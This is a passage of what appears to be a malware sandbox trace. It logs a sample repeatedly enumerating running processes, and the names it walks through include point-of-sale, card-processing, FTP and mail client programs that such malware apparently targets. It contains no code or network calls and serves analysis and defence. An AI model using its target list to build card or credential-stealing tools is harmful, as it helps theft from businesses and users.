cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0250.553] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0250.554] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0250.556] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0250.557] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0250.562] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0250.563] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0250.567] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0250.568] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0250.570] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0250.572] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0250.630] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0250.631] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0250.633] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0250.634] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0250.658] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0250.660] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0250.661] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0250.662] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0250.664] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0250.665] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0250.667] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0250.671] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0250.672] CloseHandle (hObject=0x1d14) returned 1 [0250.672] Sleep (dwMilliseconds=0x64) [0250.778] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0250.788] Process32First (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.789] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0250.791] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0250.795] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0250.796] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0250.798] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0250.799] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0250.800] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0250.802] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0250.803] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.805] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.806] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0250.819] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.820] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.821] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.874] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.875] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.877] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.878] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.879] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0250.881] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0250.882] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0250.883] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.885] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0250.889] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0250.891] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0250.892] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0250.894] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0250.895] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.896] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0250.898] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0250.899] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0250.900] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0250.905] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0250.906] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0250.908] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0250.909] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0250.911] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0250.912] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0250.913] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0250.915] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0250.945] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0250.951] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0250.953] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0250.955] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0250.957] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0250.959] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0250.961] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0250.962] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0250.975] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0250.977] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0250.978] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0250.982] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0250.983] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0250.985] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0250.986] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0250.987] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0250.989] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0250.990] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0250.992] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0250.994] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0251.068] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, 